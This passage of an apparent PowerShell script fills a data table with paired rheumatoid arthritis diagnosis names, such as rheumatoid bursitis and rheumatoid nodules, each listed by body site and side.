$null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hip","Rheumatoid heart disease with rheumatoid arthritis of unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of knee","Rheumatoid heart disease with rheumatoid arthritis of right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of knee","Rheumatoid heart disease with rheumatoid arthritis of left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of knee","Rheumatoid heart disease with rheumatoid arthritis of unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of ankle and foot","Rheumatoid heart disease with rheumatoid arthritis of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of ankle and foot","Rheumatoid heart disease with rheumatoid arthritis of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of ankle and foot","Rheumatoid heart disease with rheumatoid arthritis of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of multiple sites","Rheumatoid heart disease with rheumatoid arthritis of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis","Rheumatoid myopathy with rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of shoulder","Rheumatoid myopathy with rheumatoid arthritis of right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of shoulder","Rheumatoid myopathy with rheumatoid arthritis of left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of shoulder","Rheumatoid myopathy with rheumatoid arthritis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of elbow","Rheumatoid myopathy with rheumatoid arthritis of right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of elbow","Rheumatoid myopathy with rheumatoid arthritis of left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of elbow","Rheumatoid myopathy with rheumatoid arthritis of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of wrist","Rheumatoid myopathy with rheumatoid arthritis of right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of wrist","Rheumatoid myopathy with rheumatoid arthritis of left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of wrist","Rheumatoid myopathy with rheumatoid arthritis of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hand","Rheumatoid myopathy with rheumatoid arthritis of right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hand","Rheumatoid myopathy with rheumatoid arthritis of left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hand","Rheumatoid myopathy with rheumatoid arthritis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hip","Rheumatoid myopathy with rheumatoid arthritis of right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hip","Rheumatoid myopathy with rheumatoid arthritis of left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of hip","Rheumatoid myopathy with rheumatoid arthritis of unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of knee","Rheumatoid myopathy with rheumatoid arthritis of right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of knee","Rheumatoid myopathy with rheumatoid arthritis of left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of knee","Rheumatoid myopathy with rheumatoid arthritis of unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of ankle and foot","Rheumatoid myopathy with rheumatoid arthritis of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of ankle and foot","Rheumatoid myopathy with rheumatoid arthritis of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of ankle and foot","Rheumatoid myopathy with rheumatoid arthritis of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid myopathy with rheumatoid arthritis of multiple sites","Rheumatoid myopathy with rheumatoid arthritis of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of shoulder","Rheumatoid polyneuropathy with rheumatoid arthritis of right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of shoulder","Rheumatoid polyneuropathy with rheumatoid arthritis of left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of shoulder","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of elbow","Rheumatoid polyneuropathy with rheumatoid arthritis of right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of elbow","Rheumatoid polyneuropathy with rheumatoid arthritis of left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of elbow","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of wrist","Rheumatoid polyneuropathy with rheumatoid arthritis of right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of wrist","Rheumatoid polyneuropathy with rheumatoid arthritis of left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of wrist","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hand","Rheumatoid polyneuropathy with rheumatoid arthritis of right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hand","Rheumatoid polyneuropathy with rheumatoid arthritis of left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hand","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hip","Rheumatoid polyneuropathy with rheumatoid arthritis of right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hip","Rheumatoid polyneuropathy with rheumatoid arthritis of left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of hip","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of knee","Rheumatoid polyneuropathy with rheumatoid arthritis of right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of knee","Rheumatoid polyneuropathy with rheumatoid arthritis of left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of knee","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of ankle and foot","Rheumatoid polyneuropathy with rheumatoid arthritis of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of ankle and foot","Rheumatoid polyneuropathy with rheumatoid arthritis of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of ankle and foot","Rheumatoid polyneuropathy with rheumatoid arthritis of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid polyneuropathy with rheumatoid arthritis of multiple sites","Rheumatoid polyneuropathy with rheumatoid arthritis of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with involvement of other organs and systems","Rheumatoid arthritis of unspecified site with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of shoulder with involvement of other organs and systems","Rheumatoid arthritis of right shoulder with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of shoulder with involvement of other organs and systems","Rheumatoid arthritis of left shoulder with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of shoulder with involvement of other organs and systems","Rheumatoid arthritis of unspecified shoulder with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of elbow with involvement of other organs and systems","Rheumatoid arthritis of right elbow with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of elbow with involvement of other organs and systems","Rheumatoid arthritis of left elbow with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of elbow with involvement of other organs and systems","Rheumatoid arthritis of unspecified elbow with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of wrist with involvement of other organs and systems","Rheumatoid arthritis of right wrist with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of wrist with involvement of other organs and systems","Rheumatoid arthritis of left wrist with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of wrist with involvement of other organs and systems","Rheumatoid arthritis of unspecified wrist with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hand with involvement of other organs and systems","Rheumatoid arthritis of right hand with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hand with involvement of other organs and systems","Rheumatoid arthritis of left hand with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hand with involvement of other organs and systems","Rheumatoid arthritis of unspecified hand with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hip with involvement of other organs and systems","Rheumatoid arthritis of right hip with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hip with involvement of other organs and systems","Rheumatoid arthritis of left hip with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of hip with involvement of other organs and systems","Rheumatoid arthritis of unspecified hip with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of knee with involvement of other organs and systems","Rheumatoid arthritis of right knee with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of knee with involvement of other organs and systems","Rheumatoid arthritis of left knee with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of knee with involvement of other organs and systems","Rheumatoid arthritis of unspecified knee with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of ankle and foot with involvement of other organs and systems","Rheumatoid arthritis of right ankle and foot with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of ankle and foot with involvement of other organs and systems","Rheumatoid arthritis of left ankle and foot with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of ankle and foot with involvement of other organs and systems","Rheumatoid arthritis of unspecified ankle and foot with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis of multiple sites with involvement of other organs and systems","Rheumatoid arthritis of multiple sites with involvement of other organs and systems") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified site without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of shoulder without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right shoulder without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of shoulder without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left shoulder without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of shoulder without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified shoulder without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of elbow without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right elbow without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of elbow without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left elbow without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of elbow without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified elbow without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of wrist without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right wrist without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of wrist without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left wrist without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of wrist without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified wrist without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hand without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right hand without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hand without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left hand without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hand without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified hand without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hip without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right hip without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hip without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left hip without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of hip without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified hip without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of knee without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right knee without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of knee without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left knee without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of knee without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified knee without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of ankle and foot without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of right ankle and foot without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of ankle and foot without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of left ankle and foot without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of ankle and foot without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of unspecified ankle and foot without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor of multiple sites without organ or systems involvement","Rheumatoid arthritis with rheumatoid factor of multiple sites without organ or systems involvement") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor","Other rheumatoid arthritis with rheumatoid factor of unspecified site") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of shoulder","Other rheumatoid arthritis with rheumatoid factor of right shoulder") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of shoulder","Other rheumatoid arthritis with rheumatoid factor of left shoulder") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of shoulder","Other rheumatoid arthritis with rheumatoid factor of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of elbow","Other rheumatoid arthritis with rheumatoid factor of right elbow") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of elbow","Other rheumatoid arthritis with rheumatoid factor of left elbow") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of elbow","Other rheumatoid arthritis with rheumatoid factor of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of wrist","Other rheumatoid arthritis with rheumatoid factor of right wrist") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of wrist","Other rheumatoid arthritis with rheumatoid factor of left wrist") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of wrist","Other rheumatoid arthritis with rheumatoid factor of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hand","Other rheumatoid arthritis with rheumatoid factor of right hand") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hand","Other rheumatoid arthritis with rheumatoid factor of left hand") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hand","Other rheumatoid arthritis with rheumatoid factor of unspecified hand") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hip","Other rheumatoid arthritis with rheumatoid factor of right hip") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hip","Other rheumatoid arthritis with rheumatoid factor of left hip") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of hip","Other rheumatoid arthritis with rheumatoid factor of unspecified hip") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of knee","Other rheumatoid arthritis with rheumatoid factor of right knee") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of knee","Other rheumatoid arthritis with rheumatoid factor of left knee") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of knee","Other rheumatoid arthritis with rheumatoid factor of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of ankle and foot","Other rheumatoid arthritis with rheumatoid factor of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of ankle and foot","Other rheumatoid arthritis with rheumatoid factor of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of ankle and foot","Other rheumatoid arthritis with rheumatoid factor of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other rheumatoid arthritis with rheumatoid factor of multiple sites","Other rheumatoid arthritis with rheumatoid factor of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis with rheumatoid factor, unspecified","Rheumatoid arthritis with rheumatoid factor, unspecified") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor","Rheumatoid arthritis without rheumatoid factor, unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, shoulder","Rheumatoid arthritis without rheumatoid factor, right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, shoulder","Rheumatoid arthritis without rheumatoid factor, left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, shoulder","Rheumatoid arthritis without rheumatoid factor, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, elbow","Rheumatoid arthritis without rheumatoid factor, right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, elbow","Rheumatoid arthritis without rheumatoid factor, left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, elbow","Rheumatoid arthritis without rheumatoid factor, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, wrist","Rheumatoid arthritis without rheumatoid factor, right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, wrist","Rheumatoid arthritis without rheumatoid factor, left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, wrist","Rheumatoid arthritis without rheumatoid factor, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hand","Rheumatoid arthritis without rheumatoid factor, right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hand","Rheumatoid arthritis without rheumatoid factor, left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hand","Rheumatoid arthritis without rheumatoid factor, unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hip","Rheumatoid arthritis without rheumatoid factor, right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hip","Rheumatoid arthritis without rheumatoid factor, left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, hip","Rheumatoid arthritis without rheumatoid factor, unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, knee","Rheumatoid arthritis without rheumatoid factor, right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, knee","Rheumatoid arthritis without rheumatoid factor, left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, knee","Rheumatoid arthritis without rheumatoid factor, unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, ankle and foot","Rheumatoid arthritis without rheumatoid factor, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, ankle and foot","Rheumatoid arthritis without rheumatoid factor, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, ankle and foot","Rheumatoid arthritis without rheumatoid factor, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, vertebrae","Rheumatoid arthritis without rheumatoid factor, vertebrae") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis without rheumatoid factor, multiple sites","Rheumatoid arthritis without rheumatoid factor, multiple sites") + $null = $DiagnosisList.Rows.Add("Adult-onset Still's disease","Adult-onset Still's disease") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis","Rheumatoid bursitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, shoulder","Rheumatoid bursitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, shoulder","Rheumatoid bursitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, shoulder","Rheumatoid bursitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, elbow","Rheumatoid bursitis, right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, elbow","Rheumatoid bursitis, left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, elbow","Rheumatoid bursitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, wrist","Rheumatoid bursitis, right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, wrist","Rheumatoid bursitis, left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, wrist","Rheumatoid bursitis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hand","Rheumatoid bursitis, right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hand","Rheumatoid bursitis, left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hand","Rheumatoid bursitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hip","Rheumatoid bursitis, right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hip","Rheumatoid bursitis, left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, hip","Rheumatoid bursitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, knee","Rheumatoid bursitis, right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, knee","Rheumatoid bursitis, left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, knee","Rheumatoid bursitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, ankle and foot","Rheumatoid bursitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, ankle and foot","Rheumatoid bursitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, ankle and foot","Rheumatoid bursitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, vertebrae","Rheumatoid bursitis, vertebrae") + $null = $DiagnosisList.Rows.Add("Rheumatoid bursitis, multiple sites","Rheumatoid bursitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule","Rheumatoid nodule, unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, shoulder","Rheumatoid nodule, right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, shoulder","Rheumatoid nodule, left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, shoulder","Rheumatoid nodule, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, elbow","Rheumatoid nodule, right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, elbow","Rheumatoid nodule, left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, elbow","Rheumatoid nodule, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, wrist","Rheumatoid nodule, right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, wrist","Rheumatoid nodule, left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, wrist","Rheumatoid nodule, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hand","Rheumatoid nodule, right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hand","Rheumatoid nodule, left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hand","Rheumatoid nodule, unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hip","Rheumatoid nodule, right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hip","Rheumatoid nodule, left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, hip","Rheumatoid nodule, unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, knee","Rheumatoid nodule, right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, knee","Rheumatoid nodule, left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, knee","Rheumatoid nodule, unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, ankle and foot","Rheumatoid nodule, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, ankle and foot","Rheumatoid nodule, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, ankle and foot","Rheumatoid nodule, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, vertebrae","Rheumatoid nodule, vertebrae") + $null = $DiagnosisList.Rows.Add("Rheumatoid nodule, multiple sites","Rheumatoid nodule, multiple sites") + $null = $DiagnosisList.Rows.Add("Inflammatory polyarthropathy","Inflammatory polyarthropathy") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis","Other specified rheumatoid arthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, shoulder","Other specified rheumatoid arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, shoulder","Other specified rheumatoid arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, shoulder","Other specified rheumatoid arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, elbow","Other specified rheumatoid arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, elbow","Other specified rheumatoid arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, elbow","Other specified rheumatoid arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, wrist","Other specified rheumatoid arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, wrist","Other specified rheumatoid arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, wrist","Other specified rheumatoid arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, hand","Other specified rheumatoid arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, hand","Other specified rheumatoid arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid 